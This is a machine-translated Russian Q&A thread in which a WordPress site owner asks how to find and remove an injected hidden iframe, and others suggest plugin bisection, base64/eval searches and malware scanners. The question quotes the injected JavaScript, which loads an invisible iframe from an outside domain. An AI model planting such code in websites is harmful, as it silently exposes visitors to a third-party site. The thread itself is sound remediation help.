1. дома
  2. Вопрос и ответ
  3. Найти инъекцию iframe и удалить с сайта

Найти инъекцию iframe и удалить с сайта

2014-11-10 5 views
2

Я просмотрел свой сайт и заметил прокрутку, которой раньше не было.Найти инъекцию iframe и удалить с сайта

После осмотра я заметил, что есть невидимый iFrame.

После просмотра iframe на исходной странице я просмотрел все файлы своего сайта и не смог найти ту же строку кода, которая была в источнике.

Я запустил свой сайт, чтобы искать вредоносное ПО, но все чисто. У меня было предупреждение от Google несколько месяцев назад, но мой хост удалил вредоносные файлы, и Google одобрил очистку и все еще делает. Но теперь я вижу этот невидимый объект с URL-адресом.

Источник сценарий:

<script language="JavaScript"> 
if(document.loaded) { 
    showBrowVer(); 
} else { 
    if (window.addEventListener) { 
    window.addEventListener('load', showBrowVer, false); 
    } else { 
    window.attachEvent('onload', showBrowVer); 
    } 
} 

function showBrowVer() { 
    var divTag=document.createElement('div'); 
    divTag.id='dt'; 
    document.body.appendChild(divTag); 
    var js_kod2 = document.createElement('iframe'); 
    js_kod2.src = 'http://24corp-shop.com'; 
    js_kod2.width = '250px'; 
    js_kod2.height = '320px'; 
    js_kod2.setAttribute('style','visibility:hidden'); 
    document.getElementById('dt').appendChild(js_kod2); 
} 
</script>

Я вижу, что в настоящее время приносимый wp_head();, но я посмотрел через него и не видел ничего подозрительного.

Есть ли у кого-нибудь советы по поиску этой инъекции, чтобы вручную удалить ее с моего сайта WP?

источник

2014-11-10 Mia Gilin

+2

Отключите все свои плагины и посмотрите, добавляет ли он один из них. Если он затем активирует каждый плагин по одному, пока он не появится снова. – Howli

+0

Вы видите этот код в своем браузере или он содержится в исходном коде на вашем веб-сервере? – martinstoeckli

+0

Пила его в браузере. Я отключил все плагины один за другим, и он все еще там. –

ответ

0

В этом случае сам wp_head() не используется для распространения «злокачественного» кода, который находится на вашем сайте. Этот код находится в другом месте не на wp_head().

1 - Сделайте полную резервную копию вашего текущего сайта (базы данных + файлы) 2 - Деактивируйте все плагины и посмотрите, существует ли еще код злокачественного кода. 2 - если код злоумышленника все еще существует, проверьте папку тем. По умолчанию вы переходите к функциям.php и выполняете поиск по этому файлу для этого кода или зашифрованный код base64, eval, включая и т. Д. 3 - если злокачественный кода, не существует, после того, как вы отключили все свои плагины, значит это означает, что злокачественный код находится в одном из этих плагинов.

Использование divide & метод завоевания, чтобы найти во-первых, в каком плагине установлен злоумышленный код, и после этого идентифицировать файл со злоумышленным кодом.

источник

2014-11-10 21:01:45

+0

Это не часть любого из плагинов. Таким образом, вы говорите, что просто скопируйте папку по файлу папки по файлу для этого конкретного кода? есть конкретное ключевое слово или фраза, которые я должен попытаться найти в каждом файле? IFrame? js_kods? –

+0

Установите пару плагинов, которые помогут вам быстрее найти, где установлен злоумышленный код. - Exploit Scanner (https://wordpress.org/plugins/exploit-scanner/) - GOTMLS (https://wordpress.org/plugins/gotmls/) –

+0

Отличный плагин. Он придумал много base64, eval и видимость: скрытые линии. Но ничего похожего на мою исходную взломанную линию. –

1

Бесплатные темы WP/плагины известны тем, что используют base64_encode для «скрытия» вредоносного или нежелательного кода в источнике. В основном, они хранят закодированный текст в одном из файлов, а затем base64_decode и выводят результат как html. Я хотел бы попробовать greppingsearching для base64_decode в источнике, чтобы убедиться, что это делается.

источник

2014-11-10 21:40:26

+0

Итак, используя плагин ниже, я придумал много строк base64. Как я могу попробовать grepping для поиска base64? извините, я не уверен, что это. –

+0

Итак, предположим, вы использовали Exploit Scanner (так как это плагин, который сканирует зашифрованные скрипты base64). Единственное, что вы могли бы сделать прямо сейчас - это ручное сканирование (вы должны сделать это сами, если думаете, что сможете это сделать) каждый файл с сообщением base64. Если вы считаете, что не можете сделать это самостоятельно, напишите здесь журнал отчета об эксплоите сканера и увидите, что я могу сделать. Для автоматизированного решения ваших проблем, хотя вы даже можете использовать GOTMLS. Он имеет интегрированный антивирус, который сканирует сценарии оболочки и выравнивает их, если найден. Вам нужно только подключить свой плагин к системе GOTMLS. –

+0

Так что я почти решил это или, по крайней мере, сейчас. Сегодня я сравнивал оригинальные файлы WP с умом и заметил новые строки кода, скрытые справа от полосы прокрутки. Хак был в нескольких файлах в «темах», «загружает», и главный создатель проблем заложил себя прямо внутри моего WP-корня, скрытого в индексе и info.php. Жаль, что ни один из вредоносных плагинов не смог определить правильные файлы. Я просто рад, что все закончилось. –

0

У меня была та же проблема. Многие файлы были закалены, как в каталоге темы, так и в основных файлах. Основной причиной проблемы (код iframe был введен непосредственно перед тегом) был index.php в корневой папке. Был поддельный код «eAccelerate», впрыскивающий кодированный iframe.

Я смог обнаружить, что с плагином WordFence он дал мне список подделанных файлов.

Я изучаю, как сайт был взломан, поскольку у меня есть последние версии WP и плагинов, любая идея?

источник

2014-11-14 07:13:46

Смежные вопросы

 Смежные вопросы